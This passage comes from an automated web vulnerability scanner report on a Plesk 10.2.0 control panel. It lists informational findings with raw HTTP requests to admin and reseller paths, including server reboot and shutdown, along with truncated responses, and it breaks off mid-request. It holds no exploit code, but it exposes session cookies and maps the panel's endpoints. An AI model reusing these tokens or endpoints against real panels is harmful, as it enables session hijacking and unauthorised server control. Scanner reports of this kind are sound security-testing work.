Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=interface-pref; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:14 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.169. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/register-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/register-domain/

Request

GET /plesk/reseller@3/register-domain/?cmd=doms_reg&mpc_connect=true HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=home; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:55 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:55 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.170. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/

Request

GET /plesk/reseller@3/report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:43:57 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:43:57 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.171. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@/

Request

GET /plesk/reseller@3/report/layout@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:07 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:07 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.172. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@1/

Request

GET /plesk/reseller@3/report/layout@1/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:10 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:10 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.173. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/auto@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@1/auto@/

Request

GET /plesk/reseller@3/report/layout@1/auto@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:12 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:13 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.174. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@1/properties/

Request

GET /plesk/reseller@3/report/layout@1/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:13 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.175. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/

Request

GET /plesk/reseller@3/report/layout@2/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:43:57 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:43:57 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.176. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@/

Request

GET /plesk/reseller@3/report/layout@2/auto@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:44:07 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:07 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.177. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/properties/

Request

GET /plesk/reseller@3/report/layout@2/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: reseller_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 14:44:01 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:44:01 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.178. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/sessions/

Request

GET /plesk/reseller@3/sessions/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; psaContext=reseller-tools; BarExpanded=True

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:55:49 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:49 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.179. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/server/

Request

GET /plesk/server/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 14:42:59 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:59 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.180. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/reboot/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/server/reboot/

Request

GET /plesk/server/reboot/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:26:22 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:26:22 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.181. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/shutdown/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/server/shutdown/

Request

GET /plesk/server/shutdown/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 23 Sep 2011 19:26:22 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:26:22 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.182. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller-self/

Request

GET /reseller-self/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:13:39 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.183. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/oversell-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /reseller-self/oversell-policy/

Request

GET /reseller-self/oversell-policy/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
